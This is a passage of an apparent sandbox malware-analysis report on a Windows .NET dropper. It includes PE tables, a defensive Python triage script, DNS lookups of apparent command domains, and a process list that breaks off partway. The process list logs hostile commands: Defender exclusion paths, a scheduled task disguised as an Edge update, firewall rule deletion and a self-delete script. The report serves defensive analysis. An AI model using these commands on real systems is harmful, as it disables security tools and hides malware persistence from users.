IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC       0x2834000        0xc           .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0x2836000        0x8           (nameless section)
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x2828000        0x48          .text
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0
Name        Virtual Address  Virtual Size  Raw Size   MD5                               Xored PE  ZLIB Complexity     File Type  Entropy              Characteristics
=0aP        0x2000           0x2825cb8     0x2825e00  26a2ec61302307ff6481c01c06424c3e  unknown   unknown             unknown    unknown              IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.text       0x2828000        0x89a8        0x8a00     2d1d34cd60f236f42aafb7e63348567c  False     0.3990036231884058  data       4.916342117023775    IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc       0x2832000        0x538         0x600      1839712fe9d6e72448e9e01f7ecc6441  False     0.3873697916666667  data       3.672859168596997    IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc      0x2834000        0xc           0x200      9e3b6dcddf9d500423643546d679185e  False     0.044921875         data       0.11836963125913882  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
(nameless)  0x2836000        0x10          0x200      b931e68ae35e54247b378396e2d61abb  False     0.048828125         data       0.1794325416558982   IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Name         RVA        Size   Type                                                                               Language  Country  ZLIB Complexity
RT_VERSION   0x28320a0  0x32c  data                                                                                                  0.4211822660098522
RT_MANIFEST  0x28323cc  0x16a  XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators                     0.6132596685082873
DLL          Import
mscoree.dll  _CorExeMain
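The static section above is where several of the report's signatures come from: the compile timestamp decodes to 2080, the first section is named "=0aP" and is readable, writable and executable at once, the last section has no name, and the whole file sits at entropy 7.99998 out of 8 (a 42 MB file whose bytes are almost uniformly distributed, i.e. a compressed or encrypted payload wrapped by a small .NET stub). The following triage script is an added example for this report, not Joe Sandbox code: SECTIONS, TIMESTAMP and FILE_ENTROPY are transcribed from the tables above so the checks can be run offline, and read_pe() is a minimal header parser (assumed correct for well-formed PE files) for applying the same checks to a sample on disk.

```python
"""Static PE triage for the indicators raised on this sample: future timestamp,
nameless or special-character section names, W+X sections, near-maximal entropy.
Added example for this report, not Joe Sandbox code."""
import math
import string
import struct
from collections import Counter
from datetime import datetime, timedelta, timezone
from typing import Dict, List, Tuple

IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_WRITE = 0x80000000
ALLOWED_NAME_CHARS = set(string.ascii_letters + string.digits + "._$")

# Section table as listed in the report: name, Characteristics, entropy (None = unknown).
SECTIONS = [
    {"name": "=0aP",   "flags": 0xE0000040, "entropy": None},
    {"name": ".text",  "flags": 0x60000020, "entropy": 4.916342117023775},
    {"name": ".rsrc",  "flags": 0x40000040, "entropy": 3.672859168596997},
    {"name": ".reloc", "flags": 0x42000040, "entropy": 0.11836963125913882},
    {"name": "",       "flags": 0x60000020, "entropy": 0.1794325416558982},
]
TIMESTAMP = 0xCF2C0F01                 # IMAGE_FILE_HEADER.TimeDateStamp from the report
FILE_ENTROPY = 7.9999823397845145      # whole-file entropy from the report
ANALYSIS_TIME = datetime(2024, 10, 30, tzinfo=timezone.utc)   # date of the sandbox run


def decode_timestamp(ts: int) -> datetime:
    # timedelta arithmetic avoids platform limits of fromtimestamp() on far-future values
    return datetime(1970, 1, 1, tzinfo=timezone.utc) + timedelta(seconds=ts)


def shannon_entropy(data: bytes) -> float:
    """Bits per byte, 0.0 for constant data, 8.0 for uniformly distributed bytes."""
    n = len(data)
    if n == 0:
        return 0.0
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def section_findings(sec: Dict) -> List[str]:
    out = []
    name, flags = sec["name"], sec["flags"]
    if name == "":
        out.append("nameless section")
    elif any(ch not in ALLOWED_NAME_CHARS for ch in name):
        out.append(f"section name with special characters: {name!r}")
    if flags & IMAGE_SCN_MEM_EXECUTE and flags & IMAGE_SCN_MEM_WRITE:
        out.append(f"writable+executable section {name!r}")
    if sec["entropy"] is not None and sec["entropy"] > 7.0:
        out.append(f"high-entropy section {name!r} ({sec['entropy']:.3f})")
    return out


def triage(sections: List[Dict], timestamp: int, file_entropy: float, now: datetime) -> List[str]:
    findings = []
    built = decode_timestamp(timestamp)
    if built > now:
        findings.append(f"compile timestamp in the future: {built:%Y-%m-%d %H:%M:%S} UTC")
    if file_entropy > 7.9:
        findings.append(f"file entropy {file_entropy:.5f}: packed or encrypted payload likely")
    for sec in sections:
        findings.extend(section_findings(sec))
    return findings


def read_pe(path: str) -> Tuple[List[Dict], int, float]:
    """Section table, TimeDateStamp and whole-file entropy of a PE on disk
    (minimal parser: e_lfanew -> COFF header -> 40-byte section headers)."""
    with open(path, "rb") as fh:
        data = fh.read()
    pe = struct.unpack_from("<I", data, 0x3C)[0]
    if data[pe:pe + 4] != b"PE\0\0":
        raise ValueError("not a PE file")
    nsec, ts = struct.unpack_from("<HI", data, pe + 6)        # NumberOfSections, TimeDateStamp
    opt_size = struct.unpack_from("<H", data, pe + 20)[0]     # SizeOfOptionalHeader
    sections = []
    for i in range(nsec):
        off = pe + 24 + opt_size + 40 * i
        name, _, _, rsize, rptr, _, _, _, _, flags = struct.unpack_from("<8sIIIIIIHHI", data, off)
        sections.append({"name": name.rstrip(b"\0").decode("latin-1"), "flags": flags,
                         "entropy": shannon_entropy(data[rptr:rptr + rsize])})
    return sections, ts, shannon_entropy(data)


if __name__ == "__main__":
    for line in triage(SECTIONS, TIMESTAMP, FILE_ENTROPY, ANALYSIS_TIME):
        print("-", line)
```

On the transcribed data the script reproduces the report's four static findings (future timestamp, high file entropy, the "=0aP" section as both oddly named and W+X, and the nameless section); `triage(*read_pe(path), datetime.now(timezone.utc))` runs the same checks on any file.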
Timestamp                            Source Port  Dest Port  Source IP    Dest IP
Oct 30, 2024 12:25:41.529673100 CET  64656        53         192.168.2.4  1.1.1.1
Oct 30, 2024 12:25:42.052875996 CET  53           64656      1.1.1.1      192.168.2.4
Oct 30, 2024 12:25:42.054255962 CET  58122        53         192.168.2.4  1.1.1.1
Oct 30, 2024 12:25:42.568273067 CET  53           58122      1.1.1.1      192.168.2.4
Oct 30, 2024 12:25:52.586582899 CET  51835        53         192.168.2.4  1.1.1.1
Oct 30, 2024 12:25:53.128171921 CET  53           51835      1.1.1.1      192.168.2.4
Oct 30, 2024 12:25:53.128853083 CET  64074        53         192.168.2.4  1.1.1.1
Oct 30, 2024 12:25:53.642534971 CET  53           64074      1.1.1.1      192.168.2.4
Oct 30, 2024 12:26:03.661909103 CET  54625        53         192.168.2.4  1.1.1.1
Oct 30, 2024 12:26:03.926527023 CET  53           54625      1.1.1.1      192.168.2.4
Oct 30, 2024 12:26:03.927485943 CET  64402        53         192.168.2.4  1.1.1.1
Oct 30, 2024 12:26:03.936670065 CET  53           64402      1.1.1.1      192.168.2.4
Oct 30, 2024 12:26:13.943082094 CET  51039        53         192.168.2.4  1.1.1.1
Oct 30, 2024 12:26:14.467447996 CET  53           51039      1.1.1.1      192.168.2.4
Oct 30, 2024 12:26:14.468079090 CET  54905        53         192.168.2.4  1.1.1.1
Oct 30, 2024 12:26:14.734442949 CET  53           54905      1.1.1.1      192.168.2.4
Oct 30, 2024 12:26:24.728436947 CET  50904        53         192.168.2.4  1.1.1.1
Oct 30, 2024 12:26:25.239952087 CET  53           50904      1.1.1.1      192.168.2.4
Oct 30, 2024 12:26:25.357840061 CET  52868        53         192.168.2.4  1.1.1.1
Oct 30, 2024 12:26:25.639683962 CET  53           52868      1.1.1.1      192.168.2.4
Oct 30, 2024 12:26:35.646135092 CET  55049        53         192.168.2.4  1.1.1.1
Oct 30, 2024 12:26:36.215848923 CET  53           55049      1.1.1.1      192.168.2.4
Oct 30, 2024 12:26:36.216552973 CET  57424        53         192.168.2.4  1.1.1.1
Oct 30, 2024 12:26:36.497512102 CET  53           57424      1.1.1.1      192.168.2.4
Oct 30, 2024 12:26:46.505414009 CET  55098        53         192.168.2.4  1.1.1.1
Oct 30, 2024 12:26:47.018918991 CET  53           55098      1.1.1.1      192.168.2.4
Oct 30, 2024 12:26:47.028157949 CET  51510        53         192.168.2.4  1.1.1.1
                                                                                                                  Oct 30, 2024 12:26:47.551381111 CET53515101.1.1.1192.168.2.4
                                                                                                                  Oct 30, 2024 12:26:57.568346977 CET5735453192.168.2.41.1.1.1
                                                                                                                  Oct 30, 2024 12:26:58.094928026 CET53573541.1.1.1192.168.2.4
                                                                                                                  Oct 30, 2024 12:26:58.096508980 CET5232153192.168.2.41.1.1.1
                                                                                                                  Oct 30, 2024 12:26:58.605308056 CET53523211.1.1.1192.168.2.4
                                                                                                                  Oct 30, 2024 12:27:08.617275000 CET5126353192.168.2.41.1.1.1
                                                                                                                  Oct 30, 2024 12:27:09.129204988 CET53512631.1.1.1192.168.2.4
                                                                                                                  Oct 30, 2024 12:27:09.129983902 CET4915353192.168.2.41.1.1.1
                                                                                                                  Oct 30, 2024 12:27:09.898273945 CET53491531.1.1.1192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Oct 30, 2024 12:25:41.529673100 CET | 192.168.2.4 | 1.1.1.1 | 0xb37c | Standard query (0) | nt89s.kro.kr | A (IP address) | IN (0x0001) | false
Oct 30, 2024 12:25:42.054255962 CET | 192.168.2.4 | 1.1.1.1 | 0xf146 | Standard query (0) | nt89.kro.kr | A (IP address) | IN (0x0001) | false
Oct 30, 2024 12:25:52.586582899 CET | 192.168.2.4 | 1.1.1.1 | 0x5f7b | Standard query (0) | nt89s.kro.kr | A (IP address) | IN (0x0001) | false
Oct 30, 2024 12:25:53.128853083 CET | 192.168.2.4 | 1.1.1.1 | 0x4a36 | Standard query (0) | nt89.kro.kr | A (IP address) | IN (0x0001) | false
Oct 30, 2024 12:26:03.661909103 CET | 192.168.2.4 | 1.1.1.1 | 0xcb06 | Standard query (0) | nt89s.kro.kr | A (IP address) | IN (0x0001) | false
Oct 30, 2024 12:26:03.927485943 CET | 192.168.2.4 | 1.1.1.1 | 0xc7f | Standard query (0) | nt89.kro.kr | A (IP address) | IN (0x0001) | false
Oct 30, 2024 12:26:13.943082094 CET | 192.168.2.4 | 1.1.1.1 | 0xc1c2 | Standard query (0) | nt89s.kro.kr | A (IP address) | IN (0x0001) | false
Oct 30, 2024 12:26:14.468079090 CET | 192.168.2.4 | 1.1.1.1 | 0x7fe3 | Standard query (0) | nt89.kro.kr | A (IP address) | IN (0x0001) | false
Oct 30, 2024 12:26:24.728436947 CET | 192.168.2.4 | 1.1.1.1 | 0xa9d6 | Standard query (0) | nt89s.kro.kr | A (IP address) | IN (0x0001) | false
Oct 30, 2024 12:26:25.357840061 CET | 192.168.2.4 | 1.1.1.1 | 0xed50 | Standard query (0) | nt89.kro.kr | A (IP address) | IN (0x0001) | false
Oct 30, 2024 12:26:35.646135092 CET | 192.168.2.4 | 1.1.1.1 | 0xc214 | Standard query (0) | nt89s.kro.kr | A (IP address) | IN (0x0001) | false
Oct 30, 2024 12:26:36.216552973 CET | 192.168.2.4 | 1.1.1.1 | 0xbaed | Standard query (0) | nt89.kro.kr | A (IP address) | IN (0x0001) | false
Oct 30, 2024 12:26:46.505414009 CET | 192.168.2.4 | 1.1.1.1 | 0xc6d2 | Standard query (0) | nt89s.kro.kr | A (IP address) | IN (0x0001) | false
Oct 30, 2024 12:26:47.028157949 CET | 192.168.2.4 | 1.1.1.1 | 0x8c19 | Standard query (0) | nt89.kro.kr | A (IP address) | IN (0x0001) | false
Oct 30, 2024 12:26:57.568346977 CET | 192.168.2.4 | 1.1.1.1 | 0x949b | Standard query (0) | nt89s.kro.kr | A (IP address) | IN (0x0001) | false
Oct 30, 2024 12:26:58.096508980 CET | 192.168.2.4 | 1.1.1.1 | 0xb1a6 | Standard query (0) | nt89.kro.kr | A (IP address) | IN (0x0001) | false
Oct 30, 2024 12:27:08.617275000 CET | 192.168.2.4 | 1.1.1.1 | 0xc0a3 | Standard query (0) | nt89s.kro.kr | A (IP address) | IN (0x0001) | false
Oct 30, 2024 12:27:09.129983902 CET | 192.168.2.4 | 1.1.1.1 | 0xe1f | Standard query (0) | nt89.kro.kr | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Oct 30, 2024 12:25:42.052875996 CET | 1.1.1.1 | 192.168.2.4 | 0xb37c | Name error (3) | nt89s.kro.kr | none | none | A (IP address) | IN (0x0001) | false
Oct 30, 2024 12:25:42.568273067 CET | 1.1.1.1 | 192.168.2.4 | 0xf146 | Name error (3) | nt89.kro.kr | none | none | A (IP address) | IN (0x0001) | false
Oct 30, 2024 12:25:53.128171921 CET | 1.1.1.1 | 192.168.2.4 | 0x5f7b | Name error (3) | nt89s.kro.kr | none | none | A (IP address) | IN (0x0001) | false
Oct 30, 2024 12:25:53.642534971 CET | 1.1.1.1 | 192.168.2.4 | 0x4a36 | Name error (3) | nt89.kro.kr | none | none | A (IP address) | IN (0x0001) | false
Oct 30, 2024 12:26:03.926527023 CET | 1.1.1.1 | 192.168.2.4 | 0xcb06 | Name error (3) | nt89s.kro.kr | none | none | A (IP address) | IN (0x0001) | false
Oct 30, 2024 12:26:03.936670065 CET | 1.1.1.1 | 192.168.2.4 | 0xc7f | Name error (3) | nt89.kro.kr | none | none | A (IP address) | IN (0x0001) | false
Oct 30, 2024 12:26:14.467447996 CET | 1.1.1.1 | 192.168.2.4 | 0xc1c2 | Name error (3) | nt89s.kro.kr | none | none | A (IP address) | IN (0x0001) | false
Oct 30, 2024 12:26:14.734442949 CET | 1.1.1.1 | 192.168.2.4 | 0x7fe3 | Name error (3) | nt89.kro.kr | none | none | A (IP address) | IN (0x0001) | false
Oct 30, 2024 12:26:25.239952087 CET | 1.1.1.1 | 192.168.2.4 | 0xa9d6 | Name error (3) | nt89s.kro.kr | none | none | A (IP address) | IN (0x0001) | false
Oct 30, 2024 12:26:25.639683962 CET | 1.1.1.1 | 192.168.2.4 | 0xed50 | Name error (3) | nt89.kro.kr | none | none | A (IP address) | IN (0x0001) | false
Oct 30, 2024 12:26:36.215848923 CET | 1.1.1.1 | 192.168.2.4 | 0xc214 | Name error (3) | nt89s.kro.kr | none | none | A (IP address) | IN (0x0001) | false
Oct 30, 2024 12:26:36.497512102 CET | 1.1.1.1 | 192.168.2.4 | 0xbaed | Name error (3) | nt89.kro.kr | none | none | A (IP address) | IN (0x0001) | false
Oct 30, 2024 12:26:47.018918991 CET | 1.1.1.1 | 192.168.2.4 | 0xc6d2 | Name error (3) | nt89s.kro.kr | none | none | A (IP address) | IN (0x0001) | false
Oct 30, 2024 12:26:47.551381111 CET | 1.1.1.1 | 192.168.2.4 | 0x8c19 | Name error (3) | nt89.kro.kr | none | none | A (IP address) | IN (0x0001) | false
Oct 30, 2024 12:26:58.094928026 CET | 1.1.1.1 | 192.168.2.4 | 0x949b | Name error (3) | nt89s.kro.kr | none | none | A (IP address) | IN (0x0001) | false
Oct 30, 2024 12:26:58.605308056 CET | 1.1.1.1 | 192.168.2.4 | 0xb1a6 | Name error (3) | nt89.kro.kr | none | none | A (IP address) | IN (0x0001) | false
Oct 30, 2024 12:27:09.129204988 CET | 1.1.1.1 | 192.168.2.4 | 0xc0a3 | Name error (3) | nt89s.kro.kr | none | none | A (IP address) | IN (0x0001) | false
Oct 30, 2024 12:27:09.898273945 CET | 1.1.1.1 | 192.168.2.4 | 0xe1f | Name error (3) | nt89.kro.kr | none | none | A (IP address) | IN (0x0001) | false


Target ID: 0
Start time: 07:25:05
Start date: 30/10/2024
Path: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exe
Wow64 process (32bit): false
Commandline: "C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exe"
Imagebase: 0x21c19320000
File size: 42'137'088 bytes
MD5 hash: A9A01BCAF4FFEDDB26FD9FC79F0B57C4
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low
Has exited: true

Target ID: 1
Start time: 07:25:07
Start date: 30/10/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7699e0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 2
Start time: 07:25:18
Start date: 30/10/2024
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): false
Commandline: "powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft';Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Internet Explorer'"
Imagebase: 0x7ff788560000
File size: 452'608 bytes
MD5 hash: 04029E121A0CFA5991749937DD22A1D9
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 3
Start time: 07:25:18
Start date: 30/10/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7699e0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 4
Start time: 07:25:20
Start date: 30/10/2024
Path: C:\Windows\System32\wbem\WmiPrvSE.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Imagebase: 0x7ff693ab0000
File size: 496'640 bytes
MD5 hash: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51
Has elevated privileges: true
Has administrator privileges: false
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 8
Start time: 07:25:29
Start date: 30/10/2024
Path: C:\Windows\System32\cmd.exe
Wow64 process (32bit): false
Commandline: "cmd.exe" /c schtasks /delete /tn "MicrosoftEdgeUpdateTaskMachineCore{53F2EB3B-2C85-ABAA-BD9C-FC4F0859F018}" /f
Imagebase: 0x7ff7ca4c0000
File size: 289'792 bytes
MD5 hash: 8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 9
Start time: 07:25:29
Start date: 30/10/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7699e0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 10
Start time: 07:25:29
Start date: 30/10/2024
Path: C:\Windows\System32\schtasks.exe
Wow64 process (32bit): false
Commandline: schtasks /delete /tn "MicrosoftEdgeUpdateTaskMachineCore{53F2EB3B-2C85-ABAA-BD9C-FC4F0859F018}" /f
Imagebase: 0x7ff76f990000
File size: 235'008 bytes
MD5 hash: 76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 11
Start time: 07:25:30
Start date: 30/10/2024
Path: C:\Windows\System32\cmd.exe
Wow64 process (32bit): false
Commandline: "cmd.exe" /c schtasks /create /tn "MicrosoftEdgeUpdateTaskMachineCore{53F2EB3B-2C85-ABAB-BD9C-FC4F0859F018}" /tr "\"C:\ProgramData\Microsoft\MicrosoftEdgeUpdate.exe\"" /sc onlogon /rl HIGHEST /f
Imagebase: 0x7ff7ca4c0000
File size: 289'792 bytes
MD5 hash: 8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 12
Start time: 07:25:30
Start date: 30/10/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7699e0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

                                                                                                                  Target ID:13
                                                                                                                  Start time:07:25:30
                                                                                                                  Start date:30/10/2024
                                                                                                                  Path:C:\Windows\System32\schtasks.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:schtasks /create /tn "MicrosoftEdgeUpdateTaskMachineCore{53F2EB3B-2C85-ABAB-BD9C-FC4F0859F018}" /tr "\"C:\ProgramData\Microsoft\MicrosoftEdgeUpdate.exe\"" /sc onlogon /rl HIGHEST /f
                                                                                                                  Imagebase:0x7ff76f990000
                                                                                                                  File size:235'008 bytes
                                                                                                                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high
                                                                                                                  Has exited:true

                                                                                                                  Target ID:14
                                                                                                                  Start time:07:25:33
                                                                                                                  Start date:30/10/2024
                                                                                                                  Path:C:\ProgramData\Microsoft\MicrosoftEdgeUpdate.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:"C:\ProgramData\Microsoft\MicrosoftEdgeUpdate.exe"
                                                                                                                  Imagebase:0x1b9e5940000
                                                                                                                  File size:6'144 bytes
                                                                                                                  MD5 hash:962DB502E0DB073CAEB3A49FC7007776
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Antivirus matches:
                                                                                                                  • Detection: 42%, ReversingLabs
                                                                                                                  Reputation:low
                                                                                                                  Has exited:true

                                                                                                                  Target ID:15
                                                                                                                  Start time:07:25:33
                                                                                                                  Start date:30/10/2024
                                                                                                                  Path:C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:"C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe"
                                                                                                                  Imagebase:0x600000
                                                                                                                  File size:42'244'190 bytes
                                                                                                                  MD5 hash:9B4B06703C314B8BD494570F443A74AE
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Antivirus matches:
                                                                                                                  • Detection: 100%, Avira
                                                                                                                  • Detection: 58%, ReversingLabs
                                                                                                                  Has exited:false

                                                                                                                  Target ID:16
                                                                                                                  Start time:07:25:33
                                                                                                                  Start date:30/10/2024
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                                  File size:862'208 bytes
                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:false

                                                                                                                  Target ID:18
                                                                                                                  Start time:07:25:33
                                                                                                                  Start date:30/10/2024
                                                                                                                  Path:C:\ProgramData\Microsoft\Bound.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:"C:\ProgramData\Microsoft\Bound.exe"
                                                                                                                  Imagebase:0x212527c0000
                                                                                                                  File size:7'168 bytes
                                                                                                                  MD5 hash:A1F8A5C21AFC60D046C9075E41BB36A4
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Antivirus matches:
                                                                                                                  • Detection: 100%, Avira
                                                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                                                  • Detection: 62%, ReversingLabs
                                                                                                                  Has exited:true

                                                                                                                  Target ID:20
                                                                                                                  Start time:07:25:34
                                                                                                                  Start date:30/10/2024
                                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:"powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "netsh advfirewall firewall delete rule name=all dir=in program='C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe'"
                                                                                                                  Imagebase:0x7ff788560000
                                                                                                                  File size:452'608 bytes
                                                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  Target ID:21
                                                                                                                  Start time:07:25:34
                                                                                                                  Start date:30/10/2024
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                                  File size:862'208 bytes
                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  Target ID:22
                                                                                                                  Start time:07:25:34
                                                                                                                  Start date:30/10/2024
                                                                                                                  Path:C:\Windows\System32\WerFault.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\WerFault.exe -u -p 280 -s 1376
                                                                                                                  Imagebase:0x7ff6af750000
                                                                                                                  File size:570'736 bytes
                                                                                                                  MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  Target ID:23
                                                                                                                  Start time:07:25:34
                                                                                                                  Start date:30/10/2024
                                                                                                                  Path:C:\Windows\System32\netsh.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:"C:\Windows\system32\netsh.exe" advfirewall firewall delete rule name=all dir=in "program=C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe"
                                                                                                                  Imagebase:0x7ff613a80000
                                                                                                                  File size:96'768 bytes
                                                                                                                  MD5 hash:6F1E6DD688818BC3D1391D0CC7D597EB
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  Target ID:24
                                                                                                                  Start time:07:25:35
                                                                                                                  Start date:30/10/2024
                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\selfdelete.bat""
                                                                                                                  Imagebase:0x7ff7ca4c0000
                                                                                                                  File size:289'792 bytes
                                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  Target ID:25
                                                                                                                  Start time:07:25:35
                                                                                                                  Start date:30/10/2024
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                                  File size:862'208 bytes
                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  Target ID:26
                                                                                                                  Start time:07:25:40
                                                                                                                  Start date:30/10/2024
                                                                                                                  Path:C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:"C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe"
                                                                                                                  Imagebase:0x600000
                                                                                                                  File size:42'244'190 bytes
                                                                                                                  MD5 hash:9B4B06703C314B8BD494570F443A74AE
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:false

                                                                                                                  Target ID:27
                                                                                                                  Start time:07:25:43
                                                                                                                  Start date:30/10/2024
